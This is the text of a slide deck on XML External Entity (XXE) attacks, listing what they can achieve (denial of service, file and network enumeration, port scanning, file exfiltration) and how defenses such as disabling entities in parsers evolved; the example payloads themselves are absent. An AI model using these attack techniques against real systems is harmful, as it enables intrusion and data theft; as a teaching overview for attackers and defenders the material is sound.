XML External Entities [XXE]Slipping in through the XML backdoor

XML is boring, but

What is it?• XML 1.0 specification allows for “Entity Declaration”

• This allows XML documents to be more dynamic

• Here are a couple examples

Who is affected?• Lots of apps use XML

• Lots of formats rely on XML

• Lots of configuration files for apps use XML

• Lots of protocols rely on XML

• Some use it without even knowing it

Who cares?• Attacker and defenders should care because…

this is also a valid XXE Declaration:

Who cares?• Attacker and defenders should care because…

this is also a valid XXE Declaration:

• …aaaaaand so is this!

What can you exploit? • Denial of service

• File enumeration

• Network enumeration

• Port scanning

• Directory listing

• File exfiltration

…sometimes WITHOUT AUTH

Lets see it…

How do you stop it?• Coders that know about XXE don’t reflect XML back

• But that didn’t work well • Because error messages

• Because response timing differences

• Because Timur Yunusov & Alexey Osipov Out-of-Band XXE attack

How do you stop it? Take two• A lot of parser libraries added the option to disable XXE

• But that didn’t work well • Because many coders don’t realize this is an attack vector

How do you stop it? Take three• A lot of parser libraries disable XXE by default

• Actually works pretty well• …provided your libraries are up to date.

• …no dumb ass developers enabled ittt

Summary• XML is all over the place

• XXE is really bad

• If defending, make sure you are not vulnerable

• If attacking, make sure you test for XXE, cause it’s really SWEET if you find it

Shout-outs• Lots of smart people have researched and talked about this

• Timur Yunusov & Alexey Osipov OOB XXE talk at Blackhat 2013

• Timothy D. Morgan - What You Didn't Know About XML External Entities Attacks

• Alex Lauerman @ TrustFoundry